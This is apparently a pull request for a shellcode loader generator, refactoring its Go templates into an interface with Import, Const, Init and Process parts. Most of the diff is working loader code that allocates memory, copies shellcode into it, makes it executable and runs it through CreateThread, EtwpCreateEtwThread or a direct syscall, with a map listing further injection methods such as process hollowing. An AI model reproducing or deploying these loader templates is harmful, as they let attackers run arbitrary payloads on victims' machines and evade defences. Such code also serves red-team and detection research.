### PR TITLE
feat(cli): refactoring interfaces for templates

### DIFF
--- a/loaders/createThread.go
+++ b/loaders/createThread.go
@@ -2,19 +2,22 @@ package loaders
 
 import (
 	"fmt"
+	"strings"
 )
 
-func GetCreateThreadTemplate(targetProcess string) string {
-	InformProcessUnused(targetProcess)
+type CreateTTemplate struct{}
 
+func (t CreateTTemplate) Import() string {
 	return fmt.Sprintf(`
-package main
-
 import (
 	"syscall"
 	"unsafe"
 )
+`)
+}
 
+func (t CreateTTemplate) Const() string {
+	return fmt.Sprintf(`
 const (
 	MEM_COMMIT             = 0x1000
 	MEM_RESERVE            = 0x2000
@@ -31,9 +34,15 @@ var (
 
     RtlCopyMemory   = ntdll.MustFindProc("RtlCopyMemory")
 )
+`)
+}
 
-func ExecuteOrderSixtySix(shellcode []byte) {
+func (t CreateTTemplate) Init() string {
+	return fmt.Sprintf(``)
+}
 
+func (t CreateTTemplate) Process() string {
+	return fmt.Sprintf(`
 	addr, _, _ := VirtualAlloc.Call(
 		0,
 		uintptr(len(shellcode)),
@@ -59,6 +68,31 @@ func ExecuteOrderSixtySix(shellcode []byte) {
         threadAddr,
         0xFFFFFFFF,
     )
+`)
 }
-    `)
+
+func (t CreateTTemplate) GetTemplate(targetProcess string) string {
+	InformProcessUnused(targetProcess)
+
+	var template = `
+package main
+
+__IMPORT__STATEMENT__
+
+__CONST__STATEMENT__
+
+func ExecuteOrderSixtySix(shellcode []byte) {
+
+__IMPORT__INIT__	
+
+__IMPORT__PROCESS__
+	
+}
+    `
+	template = strings.Replace(template, "__IMPORT__STATEMENT__", t.Import(), -1)
+	template = strings.Replace(template, "__CONST__STATEMENT__", t.Const(), -1)
+	template = strings.Replace(template, "__IMPORT__INIT__", t.Init(), -1)
+	template = strings.Replace(template, "__IMPORT__PROCESS__", t.Process(), -1)
+
+	return strings.Replace(template, "__PROCESS__", targetProcess, -1)
 }

--- a/loaders/etwpCreateEtwThread.go
+++ b/loaders/etwpCreateEtwThread.go
@@ -2,20 +2,22 @@ package loaders
 
 import (
 	"fmt"
+	"strings"
 )
 
-func GetEtwpCreateEtwThreadTemplate(targetProcess string) string {
-	InformProcessUnused(targetProcess)
+type ETWPTemplate struct{}
 
+func (t ETWPTemplate) Import() string {
 	return fmt.Sprintf(`
-package main
-
 import (
     "syscall"
     "unsafe"
 )
+`)
+}
 
-
+func (t ETWPTemplate) Const() string {
+	return fmt.Sprintf(`
 const (
     MEM_COMMIT                = 0x1000
     MEM_RESERVE               = 0x2000
@@ -37,10 +39,16 @@ var (
 	VirtualProtect          = kernel32.MustFindProc("VirtualProtect")
     WaitForSingleObject     = kernel32.MustFindProc("WaitForSingleObject")
 )
+`)
+}
 
+func (t ETWPTemplate) Init() string {
+	return ""
+}
 
-func ExecuteOrderSixtySix(shellcode []byte) {
-    /* allocating the appropriate amount of memory */
+func (t ETWPTemplate) Process() string {
+	return fmt.Sprintf(`
+/* allocating the appropriate amount of memory */
     baseAddr, _, err := VirtualAlloc.Call(
         0,
         uintptr(len(shellcode)),
@@ -68,6 +76,30 @@ func ExecuteOrderSixtySix(shellcode []byte) {
 
     threadId, _, err := EtwpCreateEtwThread.Call(baseAddr, uintptr(0))
     WaitForSingleObject.Call(threadId, 0xFFFFFFFF)
-}
 `)
+}
+
+func (t ETWPTemplate) GetTemplate(targetProcess string) string {
+	InformProcessUnused(targetProcess)
+
+	var template = `
+package main
+
+__IMPORT__STATEMENT__
+
+__CONST__STATEMENT__
+
+func ExecuteOrderSixtySix(shellcode []byte) {
+    
+__IMPORT__PROCESS__
+
+}
+`
+	template = strings.Replace(template, "__IMPORT__STATEMENT__", t.Import(), -1)
+	template = strings.Replace(template, "__CONST__STATEMENT__", t.Const(), -1)
+	template = strings.Replace(template, "__IMPORT__INIT__", t.Init(), -1)
+	template = strings.Replace(template, "__IMPORT__PROCESS__", t.Process(), -1)
+
+	return template
+
 }

--- a/loaders/syscall.go
+++ b/loaders/syscall.go
@@ -2,40 +2,75 @@ package loaders
 
 import (
 	"fmt"
+	"strings"
 )
 
-func GetSyscallTemplate(targetProcess string) string {
-	InformProcessUnused(targetProcess)
+type SysTemplate struct {
+}
 
+func (t SysTemplate) Import() string {
 	return fmt.Sprintf(`
-package main
-
 import (
 	"syscall"
 	"unsafe"
 )
+`)
+}
 
+func (t SysTemplate) Const() string {
+	return fmt.Sprintf(`
 const (
 	MEM_COMMIT = 0x1000
 	MEM_RESERVE = 0x2000
 	PAGE_EXECUTE_READ = 0x20
 	PAGE_READWRITE = 0x04
 )
+`)
+}
 
-func ExecuteOrderSixtySix(shellcode []byte) {
-
+func (t SysTemplate) Init() string {
+	return fmt.Sprintf(`
 	kernel32 := syscall.MustLoadDLL("kernel32.dll")
 	ntdll := syscall.MustLoadDLL("ntdll.dll")
 
 	VirtualAlloc := kernel32.MustFindProc("VirtualAlloc")
 	VirtualProtect := kernel32.MustFindProc("VirtualProtect")
 	RtlCopyMemory := ntdll.MustFindProc("RtlCopyMemory")
+`)
+}
 
+func (t SysTemplate) Process() string {
+	return fmt.Sprintf(`
 	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE)
 	_, _, _ = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
 	oldProtect := PAGE_READWRITE
 	_, _, _ = VirtualProtect.Call(addr, uintptr(len(shellcode)), PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect)))
 	_, _, _ = syscall.Syscall(addr, 0, 0, 0, 0)
+`)
 }
-    `)
+
+func (t SysTemplate) GetTemplate(targetProcess string) string {
+	InformProcessUnused(targetProcess)
+
+	var template = `
+package main
+
+__IMPORT__STATEMENT__
+
+__CONST__STATEMENT__
+
+func ExecuteOrderSixtySix(shellcode []byte) {
+
+__IMPORT__INIT__	
+
+__IMPORT__PROCESS__
+	
+}
+`
+	template = strings.Replace(template, "__IMPORT__STATEMENT__", t.Import(), -1)
+	template = strings.Replace(template, "__CONST__STATEMENT__", t.Const(), -1)
+	template = strings.Replace(template, "__IMPORT__INIT__", t.Init(), -1)
+	template = strings.Replace(template, "__IMPORT__PROCESS__", t.Process(), -1)
+
+	return template
 }

--- a/loaders/utils.go
+++ b/loaders/utils.go
@@ -6,34 +6,29 @@ func InformProcessUnused(process string) {
 	println("\n\n[!] PLEASE NOTE: shellcode will not be injected into new process with this method")
 }
 
+type Templater interface {
+	Init() string
+	Import() string
+	Const() string
+	Process() string
+	GetTemplate(targetProcess string) string
+}
+
+var methodes = map[string]Templater{
+	"Syscall":           SysTemplate{},
+	"CRT":               CRTTemplate{},
+	"CRTx":              CRTxTemplate{},
+	"CreateThread":      CreateTTemplate{},
+	"ProcessHollowing":  ProcHollowTemplate{},
+	"EnumCalendarInfoA": EnumCalendarTemplate{},
+	"CreateFiber":       CreateFiberTemplate{},
+	"Etwp":              ETWPTemplate{},
+}
+
 func SelectTemplate(templateName string) func(string) string {
-
-	switch templateName {
-	case "CRT":
-		return GetCRTTemplate
-
-	case "CRTx":
-		return GetCRTxTemplate
-
-	case "CreateThread":
-		return GetCreateThreadTemplate
-
-	case "ProcessHollowing":
-		return GetProcessHollowingTemplate
-
-	case "Syscall":
-		return GetSyscallTemplate
-
-	case "EnumCalendarInfoA":
-		return GetEnumCalendarInfoATemplate
-
-	case "CreateFiber":
-		return GetCreateFiberTemplate
-
-	case "Etwp":
-		return GetEtwpCreateEtwThreadTemplate
-
+	template, exist := methodes[templateName]
+	if exist {
+		return template.GetTemplate
 	}
-
 	return nil
 }


### PR DESCRIPTION
In this PR I changed the way to create a new methode by adding an interface.
```golang 
type Templater interface {
	Init() string
	Import() string
	Const() string
	Process() string
	GetTemplate(targetProcess string) string
}
```

You can create all of these function for your method but only `GetTemplate` is mandatory:

- `Import` : Put your needed import
- `Const`: Add your constant/global variable
- `Init`: Add Initialization of your method
- `Process`: Add your process method
- `GetTemplate`: Build your template with function above

This new interface allows you to reuse some part of code easily you can check `createRemoteThread` and `createRemoteThreadEx` for an example.